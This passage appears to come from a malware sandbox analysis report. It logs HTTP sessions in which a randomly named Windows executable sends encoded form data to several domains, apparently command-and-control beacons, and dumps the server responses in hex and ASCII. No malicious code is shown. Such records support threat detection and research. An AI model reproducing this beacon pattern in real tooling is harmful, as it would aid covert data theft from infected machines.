1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Nov 20, 2024 04:21:32.152115107 CET	224	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source {
Nov 20, 2024 04:21:32.152151108 CET	1236	IN	Data Raw: 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 Data Ascii: border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; background-colo
Nov 20, 2024 04:21:32.152187109 CET	1236	IN	Data Raw: 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20 Data Ascii: e: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches { background
Nov 20, 2024 04:21:32.152220964 CET	412	IN	Data Raw: 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 6d 6a 64 6f 26 71 75 6f 74 3b 3c 2f 68 32 3e Data Ascii: /header><div id="container"> <h2>No route matches [POST] "/mjdo"</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide('Framework-Trace');hide('Full-Trace');show(&#
Nov 20, 2024 04:21:32.152254105 CET	1236	IN	Data Raw: 77 6f 72 6b 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 46 72 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 Data Ascii: work-Trace');; return false;">Framework Trace</a> \| <a href="#" onclick="hide('Application-Trace');hide('Framework-Trace');show('Full-Trace');; return false;">Full Trace</a> <div id="Application-Trace" sty
Nov 20, 2024 04:21:32.152287006 CET	224	IN	Data Raw: 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 71 75 65 73 74 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 Data Ascii: ctionpack (5.2.6) lib/action_dispatch/middleware/request_id.rb:27:in `call'</a><br><a class="trace-frames" data-frame-id="7" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call'</a><br><a class="trace-frame
Nov 20, 2024 04:21:32.152314901 CET	1236	IN	Data Raw: 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 Data Ascii: s" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call'</a><br
Nov 20, 2024 04:21:32.152345896 CET	224	IN	Data Raw: 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34 3a 69 6e 20 60 62 6c 6f 63 6b 20 Data Ascii: s" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames"
Nov 20, 2024 04:21:32.152379990 CET	1236	IN	Data Raw: 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 30 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 64 65 62 75 Data Ascii: data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions.rb:65:in `call'</a><br><a class="trace-frames" data-frame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:3
Nov 20, 2024 04:21:32.157351017 CET	1236	IN	Data Raw: 74 2f 63 61 63 68 65 2f 73 74 72 61 74 65 67 79 2f 6c 6f 63 61 6c 5f 63 61 63 68 65 5f 6d 69 64 64 6c 65 77 61 72 65 2e 72 62 3a 32 39 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 Data Ascii: t/cache/strategy/local_cache_middleware.rb:29:in `call'</a><br><a class="trace-frames" data-frame-id="10" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call'</a><br><a class="trace-frames" data-frame-id=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	64870	216.40.34.41	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:34.164470911 CET	10844	OUT	POST /mjdo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.prototype.garden Origin: http://www.prototype.garden Referer: http://www.prototype.garden/mjdo/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 33 43 72 69 6b 62 6f 72 67 48 45 79 78 50 59 2b 50 48 34 63 78 38 41 56 4d 59 4c 33 34 72 52 67 57 57 35 7a 33 74 6d 47 4e 4c 53 6a 41 33 59 55 38 46 6f 6b 68 35 52 67 4a 50 41 70 51 2f 47 64 35 69 59 65 53 37 36 4a 6b 78 5a 6f 6f 53 6c 57 59 41 44 2b 55 62 52 74 4d 4c 57 33 58 55 48 6b 30 76 41 4f 36 39 49 76 78 69 51 47 31 43 47 57 6e 77 63 71 46 44 74 51 65 45 44 5a 58 7a 35 49 30 4a 6f 51 53 2b 47 50 66 7a 7a 36 7a 51 54 57 51 4a 7a 68 6a 56 6d 63 73 4e 77 6d 71 77 45 7a 74 78 37 78 66 56 75 47 6f 49 59 43 6c 42 67 74 74 69 38 77 35 31 43 47 56 42 45 62 51 75 4a 67 72 76 7a 34 48 54 42 2b 53 50 4b 38 36 69 53 42 4e 75 30 37 50 5a 44 36 67 49 30 65 36 34 50 62 76 6c 77 43 32 76 55 50 6a 33 31 63 5a 38 52 59 46 33 59 46 46 42 36 4b 77 6f 74 62 35 72 38 73 49 39 31 4c 47 31 36 31 6a 49 36 4d 30 57 36 33 6f 64 54 64 62 37 4c 42 6b 59 6c 67 72 56 46 48 5a 6b 2f 51 58 62 77 4a 35 35 75 53 37 4a 74 5a 6a 57 78 78 75 31 49 75 33 41 73 30 46 46 63 4b 33 4a 57 72 4b 7a 43 30 31 2f 63 42 66 37 [TRUNCATED] Data Ascii: xDq=3CrikborgHEyxPY+PH4cx8AVMYL34rRgWW5z3tmGNLSjA3YU8Fokh5RgJPApQ/Gd5iYeS76JkxZooSlWYAD+UbRtMLW3XUHk0vAO69IvxiQG1CGWnwcqFDtQeEDZXz5I0JoQS+GPfzz6zQTWQJzhjVmcsNwmqwEztx7xfVuGoIYClBgtti8w51CGVBEbQuJgrvz4HTB+SPK86iSBNu07PZD6gI0e64PbvlwC2vUPj31cZ8RYF3YFFB6Kwotb5r8sI91LG161jI6M0W63odTdb7LBkYlgrVFHZk/QXbwJ55uS7JtZjWxxu1Iu3As0FFcK3JWrKzC01/cBf7dSEUXbAqGGnYT3ALKnxwh7+1GqXeq7i6aqXn4vz3whFEx+J5vOt4qm+FpwqGx+7wL9ASVA/LjgPR5rRj9zFa9w8TPR1S8pheFkRLLfWhPnF0ZxoJudl3Ti5yegI4GqtRJsvVjHwdDroDL5M33Enfb1IgrB8v1Plr8ib2MR8wXfuFzdZ0ibMKEhftF3WG+Uc7i+1OkwUUGSq/UlgJLnLZmUo8PhtLrEq8DI8Qp5jSAa0DDbPPH+/s3wT7+jOIewaxCsVHtbbJhlFQQ0Lfn7EH2uhAJvmNBVKxjYLwAZ+mK+xICxK2ZLXnMRIHRpUnwMLFb+FCXNA+0HLbo3atWU6EMzn0SrwIGfHRS25RCQRb1LJ81bxvbaTTD5kPv4WAEvBpDu3nTeA2amwW2jSKVXXlfCmwb1IsoN3bgshHiPTnqwqAa3vvB9q4O32V2W1pHn/ui2IR6YJpMsMJouooMAd5GxVzMzuFEVSPCty/HjhvRMomNbNNmLi2YBEYev6/irrnJEuhbnXGH1cjB7Hq9HbT/WWHd3WkrSI3GwR0Wl07K+mgYP8cZFQdWPZEzWYx0+Fy7rv4G5izDvEsBjvI359ooRVLpCXJVfGnc6lu8Cj3JXMeFywH0CTuEBGnhNXwii+gkpQCPaZUMdgEyTv9SC828EMOaMZblbSCvx [TRUNCATED]
Nov 20, 2024 04:21:34.748506069 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 32194227-f289-49e5-a354-8ffd0dbdfa7e x-runtime: 0.024051 content-length: 27175 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Nov 20, 2024 04:21:34.748553991 CET	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Nov 20, 2024 04:21:34.748625040 CET	448	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Nov 20, 2024 04:21:34.748657942 CET	1236	IN	Data Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74 Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
Nov 20, 2024 04:21:34.748692989 CET	1236	IN	Data Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f Data Ascii: Trace');show('Application-Trace');; return false;">Application Trace</a> \| <a href="#" onclick="hide('Application-Trace');hide('Full-Trace');show('Framework-Trace');; return false;">Framework Trace</a> \|
Nov 20, 2024 04:21:34.748724937 CET	1236	IN	Data Raw: 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 72 65 71 75 65 73 74 5f 73 74 6f 72 65 20 28 31 2e 35 2e 30 29 20 6c 69 Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
Nov 20, 2024 04:21:34.748759031 CET	1236	IN	Data Raw: 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 35 22 20 68 72 65 Data Ascii: uration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request'</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:
Nov 20, 2024 04:21:34.748790979 CET	1236	IN	Data Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 Data Ascii: patch/middleware/remote_ip.rb:81:in `call'</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpac
Nov 20, 2024 04:21:34.748826027 CET	1236	IN	Data Raw: 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 Data Ascii: e-id="14" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request'</a><br><a class="trace-frames" data-frame-id="16
Nov 20, 2024 04:21:34.748859882 CET	1236	IN	Data Raw: 65 20 3d 20 74 61 72 67 65 74 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 68 61 6e 67 65 20 74 68 65 20 65 78 74 72 61 63 74 65 64 20 73 6f 75 72 63 65 20 63 6f 64 65 0a 20 20 20 20 20 20 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 Data Ascii: e = target; // Change the extracted source code changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (current
Nov 20, 2024 04:21:34.753868103 CET	1236	IN	Data Raw: 20 20 3c 74 62 6f 64 79 20 63 6c 61 73 73 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 20 69 64 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 3e 0a 20 20 3c 2f 74 62 6f 64 79 3e 0a 20 20 3c 74 62 6f 64 79 3e 0a 20 20 20 20 3c 74 72 20 63 6c Data Ascii: <tbody class='fuzzy_matches' id='fuzzy_matches'> </tbody> <tbody> <tr class='route_row' data-helper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </td> <td data-route-pat

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	64871	216.40.34.41	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:36.707360983 CET	472	OUT	GET /mjdo/?Lhx=fPAh7htHyFPl-&xDq=6ADCnvQ9skB547dZOlACxZFhOrPxqdgjeRNtw+K9MfX5BFQo5QxZgNYKE+M2PfHWzU0KXpv/hGs7jgBNQBXtV5EjFabqUTy5wuEB7uMwsxBP1BSM4RINEQo= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.prototype.garden User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:21:37.210880995 CET	1236	IN	HTTP/1.1 200 OK x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin content-type: text/html; charset=utf-8 etag: W/"d476e85c69f7cfbf3d19011c14f7ebfc" cache-control: max-age=0, private, must-revalidate x-request-id: e6ffd3db-ab23-4154-af7b-b4f52efc6e48 x-runtime: 0.005630 transfer-encoding: chunked connection: close Data Raw: 31 37 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED] Data Ascii: 1759<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>prototype.garden is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p
Nov 20, 2024 04:21:37.210938931 CET	1236	IN	Data Raw: 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 Data Ascii: arked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>prototype.garden</h1><h2>is a totally awesome idea still being worked on.</h2><
Nov 20, 2024 04:21:37.210977077 CET	1236	IN	Data Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e Data Ascii: rel="nofollow" href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your
Nov 20, 2024 04:21:37.211010933 CET	1236	IN	Data Raw: 33 35 2e 31 38 36 39 36 2c 31 35 2e 37 35 33 36 35 20 2d 33 35 2e 31 38 36 39 36 2c 33 35 2e 31 38 35 32 35 20 30 2c 32 2e 37 35 37 38 31 20 30 2e 33 31 31 32 38 2c 35 2e 34 34 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 Data Ascii: 35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.7677
Nov 20, 2024 04:21:37.211045980 CET	1236	IN	Data Raw: 39 20 31 31 35 74 32 37 39 20 2d 31 31 35 74 31 31 35 20 2d 32 37 39 7a 4d 31 32 37 30 20 31 30 35 30 71 30 20 2d 33 38 20 2d 32 37 20 2d 36 35 74 2d 36 35 20 2d 32 37 74 2d 36 35 20 32 37 74 2d 32 37 20 36 35 74 32 37 20 36 35 74 36 35 20 32 37 Data Ascii: 9 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t
Nov 20, 2024 04:21:37.211081028 CET	299	IN	Data Raw: 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 6d 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 61 2e 61 73 79 6e 63 3d 31 3b 61 2e 73 72 Data Ascii: 1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	64872	188.114.96.3	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:42.295921087 CET	748	OUT	POST /jmkz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.rtpwslot888gol.sbs Origin: http://www.rtpwslot888gol.sbs Referer: http://www.rtpwslot888gol.sbs/jmkz/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 37 39 4a 61 72 53 2f 54 37 2f 68 34 61 72 2b 4f 38 37 61 35 57 78 56 42 48 45 6f 73 65 2b 61 34 78 41 2f 50 59 2f 55 39 68 73 4d 63 71 6a 6d 42 53 54 55 2f 35 53 4f 39 51 54 46 6a 54 2f 65 6f 66 73 6f 5a 41 66 4b 49 61 73 70 32 39 36 44 51 65 30 39 7a 38 38 35 76 56 51 41 71 6a 2f 72 58 6f 65 4c 66 78 69 31 4a 71 6d 45 38 67 76 43 42 49 6f 53 4b 4c 39 47 6e 6d 2b 5a 62 63 4c 37 52 43 30 45 54 68 69 58 68 79 64 64 6c 73 57 39 71 6b 63 51 2f 36 2f 58 65 44 79 70 4d 58 65 63 67 73 33 37 35 53 34 58 39 45 53 78 65 4c 55 6c 6e 78 45 57 68 6a 77 62 4d 42 48 4c 68 59 4b 32 4c 54 67 3d 3d Data Ascii: xDq=79JarS/T7/h4ar+O87a5WxVBHEose+a4xA/PY/U9hsMcqjmBSTU/5SO9QTFjT/eofsoZAfKIasp296DQe09z885vVQAqj/rXoeLfxi1JqmE8gvCBIoSKL9Gnm+ZbcL7RC0EThiXhyddlsW9qkcQ/6/XeDypMXecgs375S4X9ESxeLUlnxEWhjwbMBHLhYK2LTg==
